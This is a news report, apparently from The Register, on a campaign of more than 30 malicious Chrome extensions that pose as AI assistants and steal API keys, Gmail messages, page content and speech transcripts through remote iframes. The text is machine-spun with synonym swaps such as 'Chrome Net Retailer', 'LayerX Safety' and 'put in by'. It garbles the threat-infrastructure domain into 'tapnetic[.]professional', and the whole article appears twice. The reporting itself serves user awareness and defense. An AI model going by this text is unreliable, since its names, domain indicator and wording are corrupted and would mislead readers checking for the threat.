Greater than 30 malicious Chrome extensions put in by at the very least 260,000 customers purport to be useful AI assistants, however they steal customers’ API keys, electronic mail messages, and different private information. Even worse: many of those are nonetheless obtainable on the Chrome Net Retailer as of this writing.
A few of these extensions impersonate particular chatbots corresponding to Claude, ChatGPT, Gemini, and Grok, whereas others declare to be extra generic AI assistant instruments to assist customers summarize paperwork, write messages, and supply Gmail help.
Regardless of completely different names and extension IDs, all of them use the identical underlying codebase and permissions, and all 32 extensions talk with infrastructure below the tapnetic[.]professional area, in response to LayerX Safety, which uncovered the marketing campaign and named it AiFrame.
A few of them had been revealed below new IDs after earlier variations had been eliminated. For instance, AI Sidebar (gghdfkafnhfpaooiolhncejnlgglhkhe), which had 50,000 customers on the time of LayerX Safety’s report, appeared after the sooner Gemini AI Sidebar (fppbiomdkfbhgjjdmojlogeceejinadg), which had 80,000 customers, was faraway from the Chrome Net Retailer. The Register discovered that the re-uploaded extension (gghdfkafnhfpaooiolhncejnlgglhkhe) is now listed with 70,000 customers as of publication.
Google didn’t instantly reply to The Register‘s inquiries concerning the malicious extensions.
All 32 extension IDs are listed in LayerX’s report, so you’ll want to test it out earlier than including any AI assistant extension to your browser.
One other extension that’s nonetheless obtainable on the time of this writing is known as AI Assistant (nlhpidbjmmffhoogcennoiopekbiglbp) and has 60,000 customers. This one, which garnered the “Featured” badge on the Chrome Net Retailer, factors customers to a distant area (claude.tapnetic.professional).
It has an iframe overlay that visually seems because the extension’s interface, and this iframe permits the operator to load distant content material, altering the UI and logic, and silently including new capabilities at any time with none Chrome Net Retailer replace required.
“When instructed by the iframe, the extension queries the energetic tab and invokes a content material script that extracts readable article content material utilizing Mozilla’s Readability library,” LayerX Safety researcher Natalie Zargarov wrote. “The extracted information contains titles, textual content content material, excerpts, and web site metadata.”
The extension then sends this information – together with authentication particulars for any web page the consumer is viewing – again to the distant iframe.
Along with snarfing up all kinds of web page content material from each web site a consumer visits, this specific extension additionally helps speech recognition. It transcribes the consumer’s phrases and sends them again to the distant web page for the operator to learn.
Apparently, almost half of the extensions goal Gmail and share the identical Gmail integration codebase. This permits the extension to learn seen electronic mail content material straight from the DOM and extract message textual content through textContent from Gmail’s dialog view. This contains electronic mail thread content material and even draft or compose-related textual content, which is then despatched to distant servers.
“The marketing campaign exploits the conversational nature of AI interactions, which has conditioned customers to share detailed info,” Zargarov mentioned in an electronic mail. “By injecting iframes that mimic trusted AI interfaces, they’ve created a virtually invisible man-in-the-middle assault that intercepts all the things from API keys to non-public information earlier than it ever reaches the reliable service.” ®
Greater than 30 malicious Chrome extensions put in by at the very least 260,000 customers purport to be useful AI assistants, however they steal customers’ API keys, electronic mail messages, and different private information. Even worse: many of those are nonetheless obtainable on the Chrome Net Retailer as of this writing.
A few of these extensions impersonate particular chatbots corresponding to Claude, ChatGPT, Gemini, and Grok, whereas others declare to be extra generic AI assistant instruments to assist customers summarize paperwork, write messages, and supply Gmail help.
Regardless of completely different names and extension IDs, all of them use the identical underlying codebase and permissions, and all 32 extensions talk with infrastructure below the tapnetic[.]professional area, in response to LayerX Safety, which uncovered the marketing campaign and named it AiFrame.
A few of them had been revealed below new IDs after earlier variations had been eliminated. For instance, AI Sidebar (gghdfkafnhfpaooiolhncejnlgglhkhe), which had 50,000 customers on the time of LayerX Safety’s report, appeared after the sooner Gemini AI Sidebar (fppbiomdkfbhgjjdmojlogeceejinadg), which had 80,000 customers, was faraway from the Chrome Net Retailer. The Register discovered that the re-uploaded extension (gghdfkafnhfpaooiolhncejnlgglhkhe) is now listed with 70,000 customers as of publication.
Google didn’t instantly reply to The Register‘s inquiries concerning the malicious extensions.
All 32 extension IDs are listed in LayerX’s report, so you’ll want to test it out earlier than including any AI assistant extension to your browser.
One other extension that’s nonetheless obtainable on the time of this writing is known as AI Assistant (nlhpidbjmmffhoogcennoiopekbiglbp) and has 60,000 customers. This one, which garnered the “Featured” badge on the Chrome Net Retailer, factors customers to a distant area (claude.tapnetic.professional).
It has an iframe overlay that visually seems because the extension’s interface, and this iframe permits the operator to load distant content material, altering the UI and logic, and silently including new capabilities at any time with none Chrome Net Retailer replace required.
“When instructed by the iframe, the extension queries the energetic tab and invokes a content material script that extracts readable article content material utilizing Mozilla’s Readability library,” LayerX Safety researcher Natalie Zargarov wrote. “The extracted information contains titles, textual content content material, excerpts, and web site metadata.”
The extension then sends this information – together with authentication particulars for any web page the consumer is viewing – again to the distant iframe.
Along with snarfing up all kinds of web page content material from each web site a consumer visits, this specific extension additionally helps speech recognition. It transcribes the consumer’s phrases and sends them again to the distant web page for the operator to learn.
Apparently, almost half of the extensions goal Gmail and share the identical Gmail integration codebase. This permits the extension to learn seen electronic mail content material straight from the DOM and extract message textual content through textContent from Gmail’s dialog view. This contains electronic mail thread content material and even draft or compose-related textual content, which is then despatched to distant servers.
“The marketing campaign exploits the conversational nature of AI interactions, which has conditioned customers to share detailed info,” Zargarov mentioned in an electronic mail. “By injecting iframes that mimic trusted AI interfaces, they’ve created a virtually invisible man-in-the-middle assault that intercepts all the things from API keys to non-public information earlier than it ever reaches the reliable service.” ®
